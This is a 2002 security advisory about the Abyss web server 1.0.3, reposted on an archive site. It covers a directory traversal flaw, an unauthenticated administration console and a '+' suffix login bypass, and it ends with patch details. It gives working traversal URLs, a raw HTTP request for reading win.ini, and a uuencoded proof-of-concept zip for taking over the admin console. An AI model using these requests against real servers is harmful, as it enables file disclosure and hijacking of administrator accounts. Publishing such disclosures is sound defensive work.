23th Aug 2002 [SBWID-5656]
COMMAND
Abyss webserver directory traversal and administration bugs
SYSTEMS AFFECTED
1.0.3 (patch 2) and previous, both Windows and Linux
PROBLEM
In Auriemma Luigi [aluigi@pivx.com], PivX security advisory
[http://www.PivX.com] :
A] Directory traversal bug
==========================
The first problem I want to show, is about viewing all the files in the
systems where Abyss 1.0.3 (patch 2) and previous run.
This problem is caused by the character '\' (%5c) that is not checked
as bad character, so the server follow the path in the URI that the
attacker give until it reach the file requested.
The following are two simple examples for see the winnt\win.ini file:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0"
This last is an HTTP request that can be sent with telnet because some
browsers can modify the "\.." chars.
It is also possible to view the index of the directories (but not the
root) ONLY if the AutoIndex option is not disabled (default is enable).
This is for view winnt:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/
In Linux fortunally the attacker cannot go down to the path, but he can
go only in the Abyss folder and see SOME files like, for example, the
files in cgi-bin and chl directory but NOT the abyss.conf or the logs
(this is the same also on Windows). Two simple example are:
http://host/%2f%2e%2e%2f
http://host/%2f%2e%2e%2fcgi-bin/
and we will see the index of the Abyss and cgi-bin folder.
B] Administration bug (fixed in patch 2 release)
================================================
The console used in Abyss is the same web server that is binded to port
9999 (another default port can be the 81) and look to the files in the
CHL directory of the server. In this directory there are all the files
to manage the server remotely so the administrator can change the
parameters without modifing the abyss.conf file manually.
This bug is really incredible... an attacker without login can
reconfigure every parameter of the server. Some examples of what the
attacker can do are:
- Stop, Run and Halt the server
- change username and password of the administrator
- change all the advanced parameters of the server (log files, number
of requests, etc...)
- all the thing that the real administrator can do
The only limit for the attacker is that he cannot know the current
settings of the server, but I think that it is not so important because
he can redefine all! Remember that the attacker can redifine the
administrator login and he will be the real administrator.
The proof-of-concept can be downloaded from my userpage:
http://www.pivx.com/luigi/poc/abyss-adm.zip
C] Characters adding
====================
This is a problem that is diffused on almost all the Windows
applications and not only.
The problem is that adding some characters (in this case the '+') the
attacker can read "for example" the .chl files bypassing the login. Not
a bad bug, but is better to fix bugs like this before they can be used
for more dangerous exploitations.
Simple examples are:
http://host:9999/srvstatus.chl+
http://host:9999/consport.chl+
http://host:9999/conspass.chl+
http://host:9999/general.chl+
3) The Code
A] Example of the directory traversal bug on Win:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0"
Abyss index on Linux:
http://host/%2f%2e%2e%2f
B] For the administration bug watch the html file in my userpage
http://www.pivx.com/luigi/poc/abyss-adm.zip
It can be used to test the server that run on the same machine, at the
address 127.0.0.1. If you want to test other machines simply replace
the string "http://127.0.0.1:9999" at line 4 of the html with the host
and the port you want.
C] Add the '+' char at the end of the file requested.
UUEncode
begin 644 abyss-adm.zip
M4$L#!!0````(`)B*%2W]_OH0A`0``&<2```)````86)Y<W,N:'1MW5AM;]I(
M$/X>*?]ASJW4Y-3@O/1>BL`Z%YP&-0$$Y-K>AYX6>\$KV5[?[AK"O[\9&QL2
M4J"7.S6Z$`B[._/,VS.[ZS1"$T?.X4%CS#2'4/%)\_#@\,`*C4GKMGUV_DOM
M%%]G];?X8]&20Q^-L0P6,)[Z,I*J:;VX/*6714!&F(@[[GBA-9RAZ@6P(!:)
MT$8Q(V0"J9)R<H*_ODQ\GIJ&7:B@KL\3PU7NCM,(+YP&*UPJW9G/YS66*AZ)
M+*[Y,K8*.PV;.;NMA.=.PT9<&X$/#V9<:9(K7#Q*F?%#.#^&B;@#$W(89]/&
M6#GT1G?LB4P,?ADOP,V4X'',X#H34Y'+N'`U\"Z;5LQ$9&2=1;3R6RIF=X63
M#R8:MNNL8U=1=WLCKU[,MD*63#E@'KY2"@H%F(%()!S>@)R@UT(#E1/$!!8R
M@SE+#!@)AFL#$H-2H!?:\%@#2X+E3"J5T;7"Z`CC+F9E2DE$N1F&Q,81!Z8X
M4()C%FG0$CH0LAF'1!H0B1]E`0\H;S$<B23@=YC'B.O7P"+!\`\W?JU6.R[,
MK!>:2EUDXN3D9)F0?,(9<C4CCPTSF<X+5RI?]@8WX+9&G5ZW:=D:W;#@QAM=
M]=I-J]\;CG(:=KK]VQ&,/O>]IG75:;>]K@5=]P9'+W,'+?C=O;[%X9=B_&67
MUH`'0G'?5(KVOAI_>DI)M=+3:E9$5?/#:`-D>/ONIC.JI&%H9`HEYH\:1SM5
M!EFRTE!9LE/ABD5FI1'B*%>Q*=-;B]1"DDAD!['H6=;(+QQ\---[EHL@*+X2
MHXRYCW-U>(`Y\CYA7H>=/_#[3R7T4H,4*MB\B<LM8$MMW`P[N,U-'M6R0`SG
M@F)J5V6A]P%6E<W2@!F^2ZG%<,>,*B6_&.Y'"'>U"TL%D9R*!#0W1B33Y]G$
M_Q9!F*[:^7X.KBD']2TT.3\M+>3IJG!+=O01>BY5L,&UOCL<?NP-VIM`+TN=
MTS4T.BPXPZ/@9_!#IO1]='"G;-///4R<[33QS01=UN2_Y.E[GG#%HN?-S7]*
MR&D17,G'Y4DZD-)LX^&;JK:%`LEOD+$M_2S&PUM#GYEP/SB2W&0U[9[[;)[W
M=LU?3_?9,[_#KC<C\>!YTXDMO7S*7H=WEY0I%E=['1Y%,=ZX?6CG\E(MH$/^
M81:HO$/OVFN-EJ@DG"]B$7M]R@<4ZU[;^<PQ:<5DN>ATY6K*+B2761V)F,O,
MP)&FS2+0Q]NH=%%&15J];)61LXI-'SA/3]Q(X(UVP/_*\,*L]T(DO5SM$<P;
M=B?B+(8A?D:&)>BP_C9T1,"K0X)II<MX9>*\,H%G"USB17N_/D1I$JYP\+BQ
MF>]S/+GPZ[-LK-;[SO^_I_RIJ.Z6&&]?2:H)A@Q>0L]>P48CH5BQ].1&(H.Y
M.U_ET;O>ITTJD0.DM<$GBF6-3`0_])5(C7X%>S7MFKF+-6L/6_>BZH$!Q[L"
M]JV@)\I4X;58099GCQ[C/V)AY9SZ;DHWLL4CF;S5>-8MEY^<S^W>Z#P5KS2\
M^"%_<'^LL.A.D;$G^_(=.GFSC^W\'TQ_`U!+`0(4`!0````(`)B*%2W]_OH0
MA`0``&<2```)``````````$`(`"V@0````!A8GES<RYH=&U02P4&``````$`
,`0`W````JP0`````
`
end
1272 bytes
SOLUTION
Abyss 1.0.3 (patch 3) from the Aprelium web-site:
http://www.aprelium.com
or directly the updated executable:
http://www.aprelium.com/news/patch1033.html
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
